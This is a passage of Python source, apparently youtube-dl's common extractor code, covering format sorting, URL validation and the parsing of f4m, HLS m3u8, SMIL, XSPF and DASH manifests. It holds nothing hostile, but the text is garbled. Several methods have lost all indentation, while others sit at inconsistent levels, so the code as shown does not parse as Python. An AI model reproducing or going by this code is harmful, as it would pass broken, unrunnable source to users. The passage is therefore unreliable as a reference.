                        'description': unescapeHTML(e.get('articleBody')),
                    })
                elif item_type == 'VideoObject':
                    extract_video_object(e)
                    # Keep scanning: a later item may add more fields.
                    continue
                # Episodes/articles may embed their video as a nested object.
                video = e.get('video')
                if isinstance(video, dict) and video.get('@type') == 'VideoObject':
                    extract_video_object(video)
                # Only the first matching schema.org item is processed
                # (unless it was a VideoObject, handled by `continue` above).
                break
        return dict((k, v) for k, v in info.items() if v is not None)
@staticmethod
def _hidden_inputs(html):
html = re.sub(r'<!--(?:(?!<!--).)*-->', '', html)
hidden_inputs = {}
for input in re.findall(r'(?i)(<input[^>]+>)', html):
attrs = extract_attributes(input)
if not input:
continue
if attrs.get('type') not in ('hidden', 'submit'):
continue
name = attrs.get('name') or attrs.get('id')
value = attrs.get('value')
if name and value is not None:
hidden_inputs[name] = value
return hidden_inputs
def _form_hidden_inputs(self, form_id, html):
form = self._search_regex(
r'(?is)<form[^>]+?id=(["\'])%s\1[^>]*>(?P<form>.+?)</form>' % form_id,
html, '%s form' % form_id, group='form')
return self._hidden_inputs(form)
    def _sort_formats(self, formats, field_preference=None):
        """Sort formats in place, worst quality first, best last.

        field_preference -- optional list/tuple of format dict keys which
        completely overrides the default ranking tuple.
        Raises ExtractorError when formats is empty.
        """
        if not formats:
            raise ExtractorError('No video formats found')
        for f in formats:
            # Automatically determine tbr when missing based on abr and vbr (improves
            # formats sorting in some cases)
            if 'tbr' not in f and f.get('abr') is not None and f.get('vbr') is not None:
                f['tbr'] = f['abr'] + f['vbr']
        def _formats_key(f):
            # TODO remove the following workaround
            from ..utils import determine_ext
            if not f.get('ext') and 'url' in f:
                f['ext'] = determine_ext(f['url'])
            if isinstance(field_preference, (list, tuple)):
                # Caller-supplied ranking; missing values rank lowest
                # ('' for format_id since it compares as a string).
                return tuple(
                    f.get(field)
                    if f.get(field) is not None
                    else ('' if field == 'format_id' else -1)
                    for field in field_preference)
            preference = f.get('preference')
            if preference is None:
                preference = 0
                if f.get('ext') in ['f4f', 'f4m']:  # Not yet supported
                    preference -= 0.5
            protocol = f.get('protocol') or determine_protocol(f)
            proto_preference = 0 if protocol in ['http', 'https'] else (-0.5 if protocol == 'rtsp' else -0.1)
            if f.get('vcodec') == 'none':  # audio only
                preference -= 50
                if self._downloader.params.get('prefer_free_formats'):
                    ORDER = ['aac', 'mp3', 'm4a', 'webm', 'ogg', 'opus']
                else:
                    ORDER = ['webm', 'opus', 'ogg', 'mp3', 'aac', 'm4a']
                ext_preference = 0
                try:
                    audio_ext_preference = ORDER.index(f['ext'])
                except ValueError:
                    audio_ext_preference = -1
            else:
                if f.get('acodec') == 'none':  # video only
                    preference -= 40
                if self._downloader.params.get('prefer_free_formats'):
                    ORDER = ['flv', 'mp4', 'webm']
                else:
                    ORDER = ['webm', 'flv', 'mp4']
                try:
                    ext_preference = ORDER.index(f['ext'])
                except ValueError:
                    ext_preference = -1
                audio_ext_preference = 0
            # Ranking tuple, most significant criterion first; missing
            # numeric values rank lowest via -1.
            return (
                preference,
                f.get('language_preference') if f.get('language_preference') is not None else -1,
                f.get('quality') if f.get('quality') is not None else -1,
                f.get('tbr') if f.get('tbr') is not None else -1,
                f.get('filesize') if f.get('filesize') is not None else -1,
                f.get('vbr') if f.get('vbr') is not None else -1,
                f.get('height') if f.get('height') is not None else -1,
                f.get('width') if f.get('width') is not None else -1,
                proto_preference,
                ext_preference,
                f.get('abr') if f.get('abr') is not None else -1,
                audio_ext_preference,
                f.get('fps') if f.get('fps') is not None else -1,
                f.get('filesize_approx') if f.get('filesize_approx') is not None else -1,
                f.get('source_preference') if f.get('source_preference') is not None else -1,
                f.get('format_id') if f.get('format_id') is not None else '',
            )
        formats.sort(key=_formats_key)
def _check_formats(self, formats, video_id):
if formats:
formats[:] = filter(
lambda f: self._is_valid_url(
f['url'], video_id,
item='%s video format' % f.get('format_id') if f.get('format_id') else 'video'),
formats)
@staticmethod
def _remove_duplicate_formats(formats):
format_urls = set()
unique_formats = []
for f in formats:
if f['url'] not in format_urls:
format_urls.add(f['url'])
unique_formats.append(f)
formats[:] = unique_formats
def _is_valid_url(self, url, video_id, item='video', headers={}):
url = self._proto_relative_url(url, scheme='http:')
# For now assume non HTTP(S) URLs always valid
if not (url.startswith('http://') or url.startswith('https://')):
return True
try:
self._request_webpage(url, video_id, 'Checking %s URL' % item, headers=headers)
return True
except ExtractorError as e:
if isinstance(e.cause, compat_urllib_error.URLError):
self.to_screen(
'%s: %s URL is invalid, skipping' % (video_id, item))
return False
raise
def http_scheme(self):
""" Either "http:" or "https:", depending on the user's preferences """
return (
'http:'
if self._downloader.params.get('prefer_insecure', False)
else 'https:')
def _proto_relative_url(self, url, scheme=None):
if url is None:
return url
if url.startswith('//'):
if scheme is None:
scheme = self.http_scheme()
return scheme + url
else:
return url
def _sleep(self, timeout, video_id, msg_template=None):
if msg_template is None:
msg_template = '%(video_id)s: Waiting for %(timeout)s seconds'
msg = msg_template % {'video_id': video_id, 'timeout': timeout}
self.to_screen(msg)
time.sleep(timeout)
    def _extract_f4m_formats(self, manifest_url, video_id, preference=None, f4m_id=None,
                             transform_source=lambda s: fix_xml_ampersands(s).strip(),
                             fatal=True, m3u8_id=None):
        """Download an f4m manifest and return the formats parsed from it;
        returns [] when the download fails and fatal is False."""
        manifest = self._download_xml(
            manifest_url, video_id, 'Downloading f4m manifest',
            'Unable to download f4m manifest',
            # Some manifests may be malformed, e.g. prosiebensat1 generated manifests
            # (see https://github.com/rg3/youtube-dl/issues/6215#issuecomment-121704244)
            transform_source=transform_source,
            fatal=fatal)
        if manifest is False:
            return []
        return self._parse_f4m_formats(
            manifest, manifest_url, video_id, preference=preference, f4m_id=f4m_id,
            transform_source=transform_source, fatal=fatal, m3u8_id=m3u8_id)
    def _parse_f4m_formats(self, manifest, manifest_url, video_id, preference=None, f4m_id=None,
                           transform_source=lambda s: fix_xml_ampersands(s).strip(),
                           fatal=True, m3u8_id=None):
        """Build a formats list from a parsed f4m manifest element.

        Handles both f4m 1.0 and 2.0 namespaces, skips DRM-protected
        renditions and recurses into referenced set-level f4m/m3u8 manifests.
        """
        # currently youtube-dl cannot decode the playerVerificationChallenge as Akamai uses Adobe Alchemy
        akamai_pv = manifest.find('{http://ns.adobe.com/f4m/1.0}pv-2.0')
        if akamai_pv is not None and ';' in akamai_pv.text:
            playerVerificationChallenge = akamai_pv.text.split(';')[0]
            if playerVerificationChallenge.strip() != '':
                return []
        formats = []
        manifest_version = '1.0'
        media_nodes = manifest.findall('{http://ns.adobe.com/f4m/1.0}media')
        if not media_nodes:
            manifest_version = '2.0'
            media_nodes = manifest.findall('{http://ns.adobe.com/f4m/2.0}media')
        # Remove unsupported DRM protected media from final formats
        # rendition (see https://github.com/rg3/youtube-dl/issues/8573).
        media_nodes = remove_encrypted_media(media_nodes)
        if not media_nodes:
            return formats
        manifest_base_url = get_base_url(manifest)
        bootstrap_info = xpath_element(
            manifest, ['{http://ns.adobe.com/f4m/1.0}bootstrapInfo', '{http://ns.adobe.com/f4m/2.0}bootstrapInfo'],
            'bootstrap info', default=None)
        vcodec = None
        mime_type = xpath_text(
            manifest, ['{http://ns.adobe.com/f4m/1.0}mimeType', '{http://ns.adobe.com/f4m/2.0}mimeType'],
            'base URL', default=None)
        if mime_type and mime_type.startswith('audio/'):
            vcodec = 'none'
        for i, media_el in enumerate(media_nodes):
            tbr = int_or_none(media_el.attrib.get('bitrate'))
            width = int_or_none(media_el.attrib.get('width'))
            height = int_or_none(media_el.attrib.get('height'))
            # Fall back to the node index when no bitrate is advertised.
            format_id = '-'.join(filter(None, [f4m_id, compat_str(i if tbr is None else tbr)]))
            # If <bootstrapInfo> is present, the specified f4m is a
            # stream-level manifest, and only set-level manifests may refer to
            # external resources. See section 11.4 and section 4 of F4M spec
            if bootstrap_info is None:
                media_url = None
                # @href is introduced in 2.0, see section 11.6 of F4M spec
                if manifest_version == '2.0':
                    media_url = media_el.attrib.get('href')
                if media_url is None:
                    media_url = media_el.attrib.get('url')
                if not media_url:
                    continue
                manifest_url = (
                    media_url if media_url.startswith('http://') or media_url.startswith('https://')
                    else ((manifest_base_url or '/'.join(manifest_url.split('/')[:-1])) + '/' + media_url))
                # If media_url is itself a f4m manifest do the recursive extraction
                # since bitrates in parent manifest (this one) and media_url manifest
                # may differ leading to inability to resolve the format by requested
                # bitrate in f4m downloader
                ext = determine_ext(manifest_url)
                if ext == 'f4m':
                    f4m_formats = self._extract_f4m_formats(
                        manifest_url, video_id, preference=preference, f4m_id=f4m_id,
                        transform_source=transform_source, fatal=fatal)
                    # Sometimes stream-level manifest contains single media entry that
                    # does not contain any quality metadata (e.g. http://matchtv.ru/#live-player).
                    # At the same time parent's media entry in set-level manifest may
                    # contain it. We will copy it from parent in such cases.
                    if len(f4m_formats) == 1:
                        f = f4m_formats[0]
                        f.update({
                            'tbr': f.get('tbr') or tbr,
                            'width': f.get('width') or width,
                            'height': f.get('height') or height,
                            'format_id': f.get('format_id') if not tbr else format_id,
                            'vcodec': vcodec,
                        })
                    formats.extend(f4m_formats)
                    continue
                elif ext == 'm3u8':
                    formats.extend(self._extract_m3u8_formats(
                        manifest_url, video_id, 'mp4', preference=preference,
                        m3u8_id=m3u8_id, fatal=fatal))
                    continue
            formats.append({
                'format_id': format_id,
                'url': manifest_url,
                'manifest_url': manifest_url,
                'ext': 'flv' if bootstrap_info is not None else None,
                'protocol': 'f4m',
                'tbr': tbr,
                'width': width,
                'height': height,
                'vcodec': vcodec,
                'preference': preference,
            })
        return formats
def _m3u8_meta_format(self, m3u8_url, ext=None, preference=None, m3u8_id=None):
return {
'format_id': '-'.join(filter(None, [m3u8_id, 'meta'])),
'url': m3u8_url,
'ext': ext,
'protocol': 'm3u8',
'preference': preference - 100 if preference else -100,
'resolution': 'multiple',
'format_note': 'Quality selection URL',
}
def _extract_m3u8_formats(self, m3u8_url, video_id, ext=None,
entry_protocol='m3u8', preference=None,
m3u8_id=None, note=None, errnote=None,
fatal=True, live=False):
res = self._download_webpage_handle(
m3u8_url, video_id,
note=note or 'Downloading m3u8 information',
errnote=errnote or 'Failed to download m3u8 information',
fatal=fatal)
if res is False:
return []
m3u8_doc, urlh = res
m3u8_url = urlh.geturl()
return self._parse_m3u8_formats(
m3u8_doc, m3u8_url, ext=ext, entry_protocol=entry_protocol,
preference=preference, m3u8_id=m3u8_id, live=live)
    def _parse_m3u8_formats(self, m3u8_doc, m3u8_url, ext=None,
                            entry_protocol='m3u8', preference=None,
                            m3u8_id=None, live=False):
        """Build a formats list from an m3u8 (HLS) playlist document.

        DRM-protected playlists yield []; a media playlist yields a single
        format pointing at itself; a master playlist yields one format per
        variant stream plus per-rendition audio/video formats.
        """
        if '#EXT-X-FAXS-CM:' in m3u8_doc:  # Adobe Flash Access
            return []
        if re.search(r'#EXT-X-SESSION-KEY:.*?URI="skd://', m3u8_doc):  # Apple FairPlay
            return []
        formats = []
        # Resolve playlist-relative URIs against the playlist URL.
        format_url = lambda u: (
            u
            if re.match(r'^https?://', u)
            else compat_urlparse.urljoin(m3u8_url, u))
        # References:
        # 1. https://tools.ietf.org/html/draft-pantos-http-live-streaming-21
        # 2. https://github.com/rg3/youtube-dl/issues/12211
        # We should try extracting formats only from master playlists [1, 4.3.4],
        # i.e. playlists that describe available qualities. On the other hand
        # media playlists [1, 4.3.3] should be returned as is since they contain
        # just the media without qualities renditions.
        # Fortunately, master playlist can be easily distinguished from media
        # playlist based on particular tags availability. As of [1, 4.3.3, 4.3.4]
        # master playlist tags MUST NOT appear in a media playist and vice versa.
        # As of [1, 4.3.3.1] #EXT-X-TARGETDURATION tag is REQUIRED for every
        # media playlist and MUST NOT appear in master playlist thus we can
        # clearly detect media playlist with this criterion.
        if '#EXT-X-TARGETDURATION' in m3u8_doc:  # media playlist, return as is
            return [{
                'url': m3u8_url,
                'format_id': m3u8_id,
                'ext': ext,
                'protocol': entry_protocol,
                'preference': preference,
            }]
        # GROUP-ID -> list of EXT-X-MEDIA attribute dicts.
        groups = {}
        # Attributes of the most recent EXT-X-STREAM-INF line; consumed by
        # the following URI line and then reset.
        last_stream_inf = {}
        def extract_media(x_media_line):
            media = parse_m3u8_attributes(x_media_line)
            # As per [1, 4.3.4.1] TYPE, GROUP-ID and NAME are REQUIRED
            media_type, group_id, name = media.get('TYPE'), media.get('GROUP-ID'), media.get('NAME')
            if not (media_type and group_id and name):
                return
            groups.setdefault(group_id, []).append(media)
            if media_type not in ('VIDEO', 'AUDIO'):
                return
            media_url = media.get('URI')
            if media_url:
                format_id = []
                for v in (m3u8_id, group_id, name):
                    if v:
                        format_id.append(v)
                f = {
                    'format_id': '-'.join(format_id),
                    'url': format_url(media_url),
                    'manifest_url': m3u8_url,
                    'language': media.get('LANGUAGE'),
                    'ext': ext,
                    'protocol': entry_protocol,
                    'preference': preference,
                }
                if media_type == 'AUDIO':
                    f['vcodec'] = 'none'
                formats.append(f)
        def build_stream_name():
            # Despite specification does not mention NAME attribute for
            # EXT-X-STREAM-INF tag it still sometimes may be present (see [1]
            # or vidio test in TestInfoExtractor.test_parse_m3u8_formats)
            # 1. http://www.vidio.com/watch/165683-dj_ambred-booyah-live-2015
            stream_name = last_stream_inf.get('NAME')
            if stream_name:
                return stream_name
            # If there is no NAME in EXT-X-STREAM-INF it will be obtained
            # from corresponding rendition group
            stream_group_id = last_stream_inf.get('VIDEO')
            if not stream_group_id:
                return
            stream_group = groups.get(stream_group_id)
            if not stream_group:
                return stream_group_id
            rendition = stream_group[0]
            return rendition.get('NAME') or stream_group_id
        for line in m3u8_doc.splitlines():
            if line.startswith('#EXT-X-STREAM-INF:'):
                last_stream_inf = parse_m3u8_attributes(line)
            elif line.startswith('#EXT-X-MEDIA:'):
                extract_media(line)
            elif line.startswith('#') or not line.strip():
                # Comment or blank line.
                continue
            else:
                # A URI line belonging to the preceding EXT-X-STREAM-INF.
                tbr = float_or_none(
                    last_stream_inf.get('AVERAGE-BANDWIDTH') or
                    last_stream_inf.get('BANDWIDTH'), scale=1000)
                format_id = []
                if m3u8_id:
                    format_id.append(m3u8_id)
                stream_name = build_stream_name()
                # Bandwidth of live streams may differ over time thus making
                # format_id unpredictable. So it's better to keep provided
                # format_id intact.
                if not live:
                    format_id.append(stream_name if stream_name else '%d' % (tbr if tbr else len(formats)))
                manifest_url = format_url(line.strip())
                f = {
                    'format_id': '-'.join(format_id),
                    'url': manifest_url,
                    'manifest_url': m3u8_url,
                    'tbr': tbr,
                    'ext': ext,
                    'fps': float_or_none(last_stream_inf.get('FRAME-RATE')),
                    'protocol': entry_protocol,
                    'preference': preference,
                }
                resolution = last_stream_inf.get('RESOLUTION')
                if resolution:
                    mobj = re.search(r'(?P<width>\d+)[xX](?P<height>\d+)', resolution)
                    if mobj:
                        f['width'] = int(mobj.group('width'))
                        f['height'] = int(mobj.group('height'))
                # Unified Streaming Platform
                mobj = re.search(
                    r'audio.*?(?:%3D|=)(\d+)(?:-video.*?(?:%3D|=)(\d+))?', f['url'])
                if mobj:
                    abr, vbr = mobj.groups()
                    abr, vbr = float_or_none(abr, 1000), float_or_none(vbr, 1000)
                    f.update({
                        'vbr': vbr,
                        'abr': abr,
                    })
                codecs = parse_codecs(last_stream_inf.get('CODECS'))
                f.update(codecs)
                audio_group_id = last_stream_inf.get('AUDIO')
                # As per [1, 4.3.4.1.1] any EXT-X-STREAM-INF tag which
                # references a rendition group MUST have a CODECS attribute.
                # However, this is not always respected, for example, [2]
                # contains EXT-X-STREAM-INF tag which references AUDIO
                # rendition group but does not have CODECS and despite
                # referencing an audio group, it represents
                # a complete (with audio and video) format. So, for such cases
                # we will ignore references to rendition groups and treat them
                # as complete formats.
                if audio_group_id and codecs and f.get('vcodec') != 'none':
                    audio_group = groups.get(audio_group_id)
                    if audio_group and audio_group[0].get('URI'):
                        # TODO: update acodec for audio only formats with
                        # the same GROUP-ID
                        f['acodec'] = 'none'
                formats.append(f)
                last_stream_inf = {}
        return formats
@staticmethod
def _xpath_ns(path, namespace=None):
if not namespace:
return path
out = []
for c in path.split('/'):
if not c or c == '.':
out.append(c)
else:
out.append('{%s}%s' % (namespace, c))
return '/'.join(out)
def _extract_smil_formats(self, smil_url, video_id, fatal=True, f4m_params=None, transform_source=None):
smil = self._download_smil(smil_url, video_id, fatal=fatal, transform_source=transform_source)
if smil is False:
assert not fatal
return []
namespace = self._parse_smil_namespace(smil)
return self._parse_smil_formats(
smil, smil_url, video_id, namespace=namespace, f4m_params=f4m_params)
def _extract_smil_info(self, smil_url, video_id, fatal=True, f4m_params=None):
smil = self._download_smil(smil_url, video_id, fatal=fatal)
if smil is False:
return {}
return self._parse_smil(smil, smil_url, video_id, f4m_params=f4m_params)
    def _download_smil(self, smil_url, video_id, fatal=True, transform_source=None):
        # Thin wrapper: SMIL is XML, so reuse the XML download path;
        # returns False when the download fails and fatal is False.
        return self._download_xml(
            smil_url, video_id, 'Downloading SMIL file',
            'Unable to download SMIL file', fatal=fatal, transform_source=transform_source)
def _parse_smil(self, smil, smil_url, video_id, f4m_params=None):
    """Build a complete info dict (id/title/formats/subtitles/...) from a
    parsed SMIL document."""
    namespace = self._parse_smil_namespace(smil)

    formats = self._parse_smil_formats(
        smil, smil_url, video_id, namespace=namespace, f4m_params=f4m_params)
    subtitles = self._parse_smil_subtitles(smil, namespace=namespace)

    # NOTE(review): the video_id argument is discarded here and replaced
    # with the SMIL URL's basename (without extension) — confirm callers
    # depend on this before changing it.
    video_id = os.path.splitext(url_basename(smil_url))[0]
    title = None
    description = None
    upload_date = None
    # Metadata lives in <head><meta name="..." content="..."/> entries;
    # only the first occurrence of each recognized name wins.
    for meta in smil.findall(self._xpath_ns('./head/meta', namespace)):
        name = meta.attrib.get('name')
        content = meta.attrib.get('content')
        if not name or not content:
            continue
        if not title and name == 'title':
            title = content
        elif not description and name in ('description', 'abstract'):
            description = content
        elif not upload_date and name == 'date':
            upload_date = unified_strdate(content)

    # Only <image> elements that actually carry a src become thumbnails.
    thumbnails = [{
        'id': image.get('type'),
        'url': image.get('src'),
        'width': int_or_none(image.get('width')),
        'height': int_or_none(image.get('height')),
    } for image in smil.findall(self._xpath_ns('.//image', namespace)) if image.get('src')]

    return {
        'id': video_id,
        'title': title or video_id,
        'description': description,
        'upload_date': upload_date,
        'thumbnails': thumbnails,
        'formats': formats,
        'subtitles': subtitles,
    }
def _parse_smil_namespace(self, smil):
    """Return the XML namespace of the root <smil> element, or None."""
    root_tag = smil.tag
    return self._search_regex(
        r'(?i)^{([^}]+)?}smil$', root_tag, 'namespace', default=None)
def _parse_smil_formats(self, smil, smil_url, video_id, namespace=None, f4m_params=None, transform_rtmp_url=None):
    """Extract the format list from a parsed SMIL document.

    Handles RTMP streams as well as HLS/HDS/DASH/ISM sub-manifests and
    plain HTTP progressive downloads referenced by <video>/<audio> tags.
    """
    # A <meta base=...> (or httpBase) in <head> overrides the manifest URL
    # as the base for resolving relative media URLs.
    base = smil_url
    for meta in smil.findall(self._xpath_ns('./head/meta', namespace)):
        b = meta.get('base') or meta.get('httpBase')
        if b:
            base = b
            break

    formats = []
    rtmp_count = 0
    http_count = 0
    m3u8_count = 0

    # De-duplicate identical src attributes across media elements.
    srcs = []
    media = smil.findall(self._xpath_ns('.//video', namespace)) + smil.findall(self._xpath_ns('.//audio', namespace))
    for medium in media:
        src = medium.get('src')
        if not src or src in srcs:
            continue
        srcs.append(src)

        # system-bitrate is in bit/s; scale to kbit/s.
        bitrate = float_or_none(medium.get('system-bitrate') or medium.get('systemBitrate'), 1000)
        filesize = int_or_none(medium.get('size') or medium.get('fileSize'))
        width = int_or_none(medium.get('width'))
        height = int_or_none(medium.get('height'))
        proto = medium.get('proto')
        ext = medium.get('ext')
        src_ext = determine_ext(src)
        streamer = medium.get('streamer') or base

        if proto == 'rtmp' or streamer.startswith('rtmp'):
            rtmp_count += 1
            formats.append({
                'url': streamer,
                'play_path': src,
                'ext': 'flv',
                'format_id': 'rtmp-%d' % (rtmp_count if bitrate is None else bitrate),
                'tbr': bitrate,
                'filesize': filesize,
                'width': width,
                'height': height,
            })
            # Site-specific hook may rewrite both the RTMP URL and the
            # play path; re-apply them to the format just appended.
            if transform_rtmp_url:
                streamer, src = transform_rtmp_url(streamer, src)
                formats[-1].update({
                    'url': streamer,
                    'play_path': src,
                })
            continue

        src_url = src if src.startswith('http') else compat_urlparse.urljoin(base, src)
        src_url = src_url.strip()

        if proto == 'm3u8' or src_ext == 'm3u8':
            m3u8_formats = self._extract_m3u8_formats(
                src_url, video_id, ext or 'mp4', m3u8_id='hls', fatal=False)
            # A single-rendition playlist inherits the bitrate/geometry
            # advertised by the SMIL entry itself.
            if len(m3u8_formats) == 1:
                m3u8_count += 1
                m3u8_formats[0].update({
                    'format_id': 'hls-%d' % (m3u8_count if bitrate is None else bitrate),
                    'tbr': bitrate,
                    'width': width,
                    'height': height,
                })
            formats.extend(m3u8_formats)
        elif src_ext == 'f4m':
            f4m_url = src_url
            if not f4m_params:
                f4m_params = {
                    'hdcore': '3.2.0',
                    'plugin': 'flowplayer-3.2.0.1',
                }
            f4m_url += '&' if '?' in f4m_url else '?'
            f4m_url += compat_urllib_parse_urlencode(f4m_params)
            formats.extend(self._extract_f4m_formats(f4m_url, video_id, f4m_id='hds', fatal=False))
        elif src_ext == 'mpd':
            formats.extend(self._extract_mpd_formats(
                src_url, video_id, mpd_id='dash', fatal=False))
        elif re.search(r'\.ism/[Mm]anifest', src_url):
            formats.extend(self._extract_ism_formats(
                src_url, video_id, ism_id='mss', fatal=False))
        elif src_url.startswith('http') and self._is_valid_url(src, video_id):
            http_count += 1
            formats.append({
                'url': src_url,
                'ext': ext or src_ext or 'flv',
                'format_id': 'http-%d' % (bitrate or http_count),
                'tbr': bitrate,
                'filesize': filesize,
                'width': width,
                'height': height,
            })

    return formats
def _parse_smil_subtitles(self, smil, namespace=None, subtitles_lang='en'):
    """Collect subtitle tracks from <textstream> elements, grouped by
    language (falling back to subtitles_lang when none is declared)."""
    subtitles = {}
    seen_srcs = []
    for textstream in smil.findall(self._xpath_ns('.//textstream', namespace)):
        src = textstream.get('src')
        if not src or src in seen_srcs:
            continue
        seen_srcs.append(src)
        ext = textstream.get('ext') or mimetype2ext(textstream.get('type')) or determine_ext(src)
        lang = (
            textstream.get('systemLanguage')
            or textstream.get('systemLanguageName')
            or textstream.get('lang')
            or subtitles_lang)
        subtitles.setdefault(lang, []).append({
            'url': src,
            'ext': ext,
        })
    return subtitles
def _extract_xspf_playlist(self, xspf_url, playlist_id, fatal=True):
    """Download an XSPF playlist and return the entries parsed from it.

    Returns [] when the download fails and fatal is False.
    """
    xspf = self._download_xml(
        # Fixed typo in the user-visible note: 'xpsf' -> 'xspf'.
        xspf_url, playlist_id, 'Downloading xspf playlist',
        'Unable to download xspf manifest', fatal=fatal)
    if xspf is False:
        return []
    return self._parse_xspf(
        xspf, playlist_id, xspf_url=xspf_url,
        xspf_base_url=base_url(xspf_url))
def _parse_xspf(self, xspf_doc, playlist_id, xspf_url=None, xspf_base_url=None):
    """Turn a parsed XSPF document into a list of entry info dicts."""
    NS_MAP = {
        'xspf': 'http://xspf.org/ns/0/',
        # StreamOne extension namespace carrying label/width/height.
        's1': 'http://static.streamone.nl/player/ns/0',
    }

    entries = []
    for track in xspf_doc.findall(xpath_with_ns('./xspf:trackList/xspf:track', NS_MAP)):
        title = xpath_text(
            track, xpath_with_ns('./xspf:title', NS_MAP), 'title', default=playlist_id)
        description = xpath_text(
            track, xpath_with_ns('./xspf:annotation', NS_MAP), 'description')
        thumbnail = xpath_text(
            track, xpath_with_ns('./xspf:image', NS_MAP), 'thumbnail')
        # XSPF stores durations in milliseconds; scale to seconds.
        duration = float_or_none(
            xpath_text(track, xpath_with_ns('./xspf:duration', NS_MAP), 'duration'), 1000)

        formats = []
        for location in track.findall(xpath_with_ns('./xspf:location', NS_MAP)):
            format_url = urljoin(xspf_base_url, location.text)
            if not format_url:
                continue
            formats.append({
                'url': format_url,
                'manifest_url': xspf_url,
                'format_id': location.get(xpath_with_ns('s1:label', NS_MAP)),
                'width': int_or_none(location.get(xpath_with_ns('s1:width', NS_MAP))),
                'height': int_or_none(location.get(xpath_with_ns('s1:height', NS_MAP))),
            })
        self._sort_formats(formats)

        entries.append({
            'id': playlist_id,
            'title': title,
            'description': description,
            'thumbnail': thumbnail,
            'duration': duration,
            'formats': formats,
        })
    return entries
def _extract_mpd_formats(self, mpd_url, video_id, mpd_id=None, note=None, errnote=None, fatal=True, formats_dict={}):
    """Download a DASH MPD manifest and return the formats parsed from it.

    Returns [] when the download fails and fatal is False.
    """
    res = self._download_xml_handle(
        mpd_url, video_id,
        note=note or 'Downloading MPD manifest',
        errnote=errnote or 'Failed to download MPD manifest',
        fatal=fatal)
    if res is False:
        return []
    mpd_doc, urlh = res
    # Relative URLs inside the manifest resolve against the final
    # (post-redirect) URL, not the one originally requested.
    return self._parse_mpd_formats(
        mpd_doc, mpd_id=mpd_id, mpd_base_url=base_url(urlh.geturl()),
        formats_dict=formats_dict, mpd_url=mpd_url)
def _parse_mpd_formats(self, mpd_doc, mpd_id=None, mpd_base_url='', formats_dict={}, mpd_url=None):
    """
    Parse formats from MPD manifest.
    References:
     1. MPEG-DASH Standard, ISO/IEC 23009-1:2014(E),
        http://standards.iso.org/ittf/PubliclyAvailableStandards/c065274_ISO_IEC_23009-1_2014.zip
     2. https://en.wikipedia.org/wiki/Dynamic_Adaptive_Streaming_over_HTTP
    """
    # Live (dynamic) manifests are not supported.
    if mpd_doc.get('type') == 'dynamic':
        return []

    namespace = self._search_regex(r'(?i)^{([^}]+)?}MPD$', mpd_doc.tag, 'namespace', default=None)

    def _add_ns(path):
        return self._xpath_ns(path, namespace)

    def is_drm_protected(element):
        return element.find(_add_ns('ContentProtection')) is not None

    def extract_multisegment_info(element, ms_parent_info):
        # Child elements inherit and may override their parent's
        # multisegment info (Period -> AdaptationSet -> Representation).
        ms_info = ms_parent_info.copy()

        # As per [1, 5.3.9.2.2] SegmentList and SegmentTemplate share some
        # common attributes and elements. We will only extract relevant
        # for us.
        def extract_common(source):
            segment_timeline = source.find(_add_ns('SegmentTimeline'))
            if segment_timeline is not None:
                s_e = segment_timeline.findall(_add_ns('S'))
                if s_e:
                    ms_info['total_number'] = 0
                    ms_info['s'] = []
                    for s in s_e:
                        r = int(s.get('r', 0))
                        ms_info['total_number'] += 1 + r
                        ms_info['s'].append({
                            't': int(s.get('t', 0)),
                            # @d is mandatory (see [1, 5.3.9.6.2, Table 17, page 60])
                            'd': int(s.attrib['d']),
                            'r': r,
                        })
            start_number = source.get('startNumber')
            if start_number:
                ms_info['start_number'] = int(start_number)
            timescale = source.get('timescale')
            if timescale:
                ms_info['timescale'] = int(timescale)
            segment_duration = source.get('duration')
            if segment_duration:
                ms_info['segment_duration'] = float(segment_duration)

        def extract_Initialization(source):
            initialization = source.find(_add_ns('Initialization'))
            if initialization is not None:
                ms_info['initialization_url'] = initialization.attrib['sourceURL']

        segment_list = element.find(_add_ns('SegmentList'))
        if segment_list is not None:
            extract_common(segment_list)
            extract_Initialization(segment_list)
            segment_urls_e = segment_list.findall(_add_ns('SegmentURL'))
            if segment_urls_e:
                ms_info['segment_urls'] = [segment.attrib['media'] for segment in segment_urls_e]
        else:
            segment_template = element.find(_add_ns('SegmentTemplate'))
            if segment_template is not None:
                extract_common(segment_template)
                media = segment_template.get('media')
                if media:
                    ms_info['media'] = media
                initialization = segment_template.get('initialization')
                if initialization:
                    ms_info['initialization'] = initialization
                else:
                    extract_Initialization(segment_template)
        return ms_info

    mpd_duration = parse_duration(mpd_doc.get('mediaPresentationDuration'))
    formats = []
    for period in mpd_doc.findall(_add_ns('Period')):
        period_duration = parse_duration(period.get('duration')) or mpd_duration
        period_ms_info = extract_multisegment_info(period, {
            'start_number': 1,
            'timescale': 1,
        })
        for adaptation_set in period.findall(_add_ns('AdaptationSet')):
            if is_drm_protected(adaptation_set):
                continue
            adaption_set_ms_info = extract_multisegment_info(adaptation_set, period_ms_info)
            for representation in adaptation_set.findall(_add_ns('Representation')):
                if is_drm_protected(representation):
                    continue
                # Representation attributes override AdaptationSet ones.
                representation_attrib = adaptation_set.attrib.copy()
                representation_attrib.update(representation.attrib)
                # According to [1, 5.3.7.2, Table 9, page 41], @mimeType is mandatory
                mime_type = representation_attrib['mimeType']
                content_type = mime_type.split('/')[0]
                if content_type == 'text':
                    # TODO implement WebVTT downloading
                    pass
                elif content_type in ('video', 'audio'):
                    # BaseURL elements may nest; walk inside-out, stopping
                    # as soon as an absolute URL has been assembled.
                    base_url = ''
                    for element in (representation, adaptation_set, period, mpd_doc):
                        base_url_e = element.find(_add_ns('BaseURL'))
                        if base_url_e is not None:
                            base_url = base_url_e.text + base_url
                            if re.match(r'^https?://', base_url):
                                break
                    if mpd_base_url and not re.match(r'^https?://', base_url):
                        if not mpd_base_url.endswith('/') and not base_url.startswith('/'):
                            mpd_base_url += '/'
                        base_url = mpd_base_url + base_url
                    representation_id = representation_attrib.get('id')
                    lang = representation_attrib.get('lang')
                    url_el = representation.find(_add_ns('BaseURL'))
                    filesize = int_or_none(url_el.attrib.get('{http://youtube.com/yt/2012/10/10}contentLength') if url_el is not None else None)
                    bandwidth = int_or_none(representation_attrib.get('bandwidth'))
                    f = {
                        'format_id': '%s-%s' % (mpd_id, representation_id) if mpd_id else representation_id,
                        'url': base_url,
                        'manifest_url': mpd_url,
                        'ext': mimetype2ext(mime_type),
                        'width': int_or_none(representation_attrib.get('width')),
                        'height': int_or_none(representation_attrib.get('height')),
                        'tbr': float_or_none(bandwidth, 1000),
                        'asr': int_or_none(representation_attrib.get('audioSamplingRate')),
                        'fps': int_or_none(representation_attrib.get('frameRate')),
